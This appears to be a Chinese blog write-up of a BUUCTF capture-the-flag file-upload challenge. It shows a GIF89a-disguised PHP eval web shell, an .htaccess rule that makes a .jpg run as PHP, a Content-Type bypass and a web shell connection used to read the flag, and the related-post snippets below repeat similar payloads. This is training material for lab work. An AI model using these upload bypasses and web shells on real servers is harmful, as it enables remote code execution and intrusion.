BUUCTF:[GXYCTF2019]BabyUpload

最新推荐文章于 2025-06-06 11:58:23 发布
原创 最新推荐文章于 2025-06-06 11:58:23 发布 · 262 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章描述了一次针对只允许上传jpg文件的靶机进行攻击的过程。作者尝试使用GIF89a头部构造PHP代码,并利用.htaccess文件修改处理方式为PHP,从而实现PHP木马的上传。最后,通过蚁剑连接并查找flag。

打开靶机,
在这里插入图片描述
文件上传题。我试了试,只有jpg文件可以传。我们传一个一句话木马。

在这里插入图片描述
改为jpg上传。
在这里插入图片描述
有过滤。我们想办法绕过。构造

GIF89a
<script language="php">eval($_POST['wz']);</script>

在这里插入图片描述

来代替原来的一句话木马。改为jpg上传。
在这里插入图片描述
上传成功。bp抓包看看能不能改后缀为php。
在这里插入图片描述
改完放包。
在这里插入图片描述
还是改回来吧。
到了这里,我们就得考虑一下用.user.ini文件还是用.htaccess文件。因为不知道目录中是否有php文件。所以用.htaccess文件。构造:

<FilesMatch "a.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

在这里插入图片描述
注意这里的a.jpg需要和你上传的一句话木马文件名相同。
我们上传.htaccess文件。
在这里插入图片描述
去bp抓包,改一下标签。
在这里插入图片描述
这里改为image/jpeg
在这里插入图片描述
放包
在这里插入图片描述
再传一下一句话木马,看一下文件路径。
在这里插入图片描述
这个就是文件路径了。我们链接蚁剑。
在这里插入图片描述
然后查看flag
在这里插入图片描述
柴犬真的好可爱。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

寡人略秀
关注
[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)
oZuoShen123的博客
10-11 1307
1、上传一句话,提示“后缀不允许ph” 2、修改后缀为jpg,提示“上传类型也太露骨了吧!” 3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊” 4、修改一句话的标识为: @eval($_POST["pwd"]); 5、上传.htaccess
BUUCTF-Web】[极客大挑战 2019]Upload
weixin_49298681的博客
01-05 1369
Upload=> 文件上传漏洞。
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
2302_79800344的博客
03-03 4226
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。
BUUCTF [GXYCTF2019]BabyUpload
weixin_45253622的博客
05-26 2144
文件上传题型。 直接上传一句话木马 可以看出是黑名单过滤, 想到上传.htaccess文件,然后上传图片马,getshell。 key.htaccess文件内容如下: AddType application/x-httpd-php .jpg 抓包修改文件名上传成功。 接着上传图片马,发现; 猜测过滤<?;修改一句话如下: <script language = 'php'>eval($_REQUEST[a]); </script> 构造...
[GXYCTF2019]BabyUpload
pakho_C的博客
02-19 1049
web第33题 [GXYCTF2019]BabyUpload 打开靶场 一道文件上传的题目 先直接上传图片 上传jpg,png,gif文件都会有这个提示,看来是对MIME类型做了限制,上传一个png文件,将mime类型改为image/jpeg可以上传,但是image/png不行 尝试直接上传php木马文件 提示后缀名不能有ph 添加空格,修改mime类型尝试绕过 又被检测了 仍然尝试绕过,都失败了,思考,提示“诶,别蒙我啊,这标志明显还是php啊”可能是对文件内容做了检测,例如不允许出现&
BUUCTF-[GXYCTF2019]BabyUpload
qq_43006864的博客
05-06 1277
直接开题。 上来就是一个文件上传。 这里随便传了几个文件测试,发现只能传入jpeg格式的文件。对文件名和文件类型都做了限制。 所以这里想到了之前用过了.htaccess。 传入.htaccess,格式修改为image/jpeg。 上传成功, 传入php探针进行测试,这里推荐直接上phtml格式的马子。 传入php探针,并执行成功,看来是没问题的。这里路径大家参考这个: http://84247058-8c5c-496d-b573-d01266658f00.node4.b...
【复习】BUUCTF:[GXYCTF2019]BabyUpload -- 对.htaccess的 包含自己和解析图片马为php文件都可以的 。。也算easy
Zero_Adam的博客
04-19 1327
一、自己做: 只需要更改Content-Type就能够绕过了,但是好像对文件内容有过滤。 那么,不能有? ,看看PHP的版本,看看能够用html的script进行绕过 能成功,看看能否解析。
[GXYCTF2019]BabyUpload 1通关详解
最新发布
m0_74135202的博客
06-06 1342
修改Content-Type 上传--------------诶,别蒙我啊,这标志明显还是php啊。抓包修改文件名为.htaccess Content-Type为image/jpeg。上传.php文件-------不能ph后缀。上传.htaccess文件。
BUUCTF [web专项29][GXYCTF2019]BabyUpload
yanglinchiji的博客
11-07 174
成功,再次上传 .htaccess 来修改后缀(吸取了上次文件上传题的经验,成功上传的结果没有index,不需要用.user.ini)发现后缀不能带ph,那么就猜测是需要上传木马图上去,在上传一些文件来修改上传目录的指定文件后缀为php来进行执行。上传成功,我们先到上传目录下的1.jpg下看看是否执行了。已经执行了,那么我们就需要蚁剑连上去即可。那就需要抓包修改上传类型来绕过检测了。进入后还是发现是个文件上传题。在根目录下即可获得flag。还是用以前总结出来的方法。
BUUCTFBabyUpload[GXYCTF2019]
金 帛的博客
06-11 743
BUUCTF的wp
BUUCTF——[GXYCTF2019]BabyUpload
m_de_g的博客
04-17 989
【代码】BUUCTF——[GXYCTF2019]BabyUpload
Excel中的xls、xlsx、xlsm混合文件,看我用Python如何统一处理......
pdcfighting的博客
02-07 446
点击上方“Python爬虫与数据挖掘”,进行关注回复“书籍”即可获赠Python从入门到进阶共10本电子书今日鸡汤洞房昨夜停红烛,待晓堂前拜舅姑。引言 Python语言,近几年在办公自动...
BUUCTF:[GXYCTF2019]BabyUpload1
羽的博客
07-07 3497
文件上传漏洞。 不过这里我要吐槽一下,这个题首先他不允许传.png文件, 再者.jpg文件不能大,打了也报错,传不上去。 可想而知,我当时在做这个题的时候跟见了鬼一样难受,什么文件都传不了。 接着做题吧: 试着传一个PHP文件,告诉我不能传ph开头的文件后缀名,所以这里表示后端把所有php和php的别名都封死了。 根据之前upload-labs积累的绕过姿势,还可以上传.htaccess文件。 再次上传一句话木马时,又被拦截了,这里应该是后端检测了文件内容。盲猜检测<...
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 2190
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
【学习笔记 41】 buu [GXYCTF2019]BabyUpload
weixin_43553654的博客
08-02 629
0x00 知识点 .htaccess文件上传绕过 0x01 知识点详解 请参考我上一篇学习笔记 0x02 解题思路 一看就知道是上传,尝试php3,phtml,普通一句话木马改后缀也不行,而且是添加了对文件的检测。 继续尝试利用.htaccess文件上传,首先上传一个.htaccess文件 <FilesMatch "flag.png"> SetHandler application/x-httpd-php </FilesMatch> 这里注意,这道题不知道为什么,我这
BUUCTF:[GXYCTF2019]BabyUpload
末初 · mochu7
03-24 9387
https://buuoj.cn/challenges#[GXYCTF2019]BabyUpload 有几个上传限制,一起来看一下 1、后缀名不能有ph!对于文件后缀名的限制,无法绕过这里 2、上传类型也太露骨了吧!对Content-Type的限制,修改为image/jpeg即可绕过 3、诶,别蒙我啊,这标志明显还是php啊对上传文件的内容进行了检测,不能含有<?,这里的PHP版本为:PHP/5.6.23,可以使用<script language="php">eval($_POS
【CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 1269
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
[MRCTF2020]你传你呢
Sk1y的博客
03-02 3316
[MRCTF2020]你传你????呢 目录 [MRCTF2020]你传你????呢 上传.htaccess 上传1.png 蚁剑连接 题目:buu平台 解题过程: 需要上传两个文件 .htaccess是什么 原文传送门 .htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来
buuctf [GXYCTF2019]Ping Ping Ping
03-28
### BUUCTF GXYCTF2019 Ping Ping Ping Writeup 解题思路 该题目属于命令执行绕过类题目,主要考察选手对于PHP代码中的输入验证机制以及Linux命令执行的理解。以下是详细的解题分析: #### 题目背景 通过提供的...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值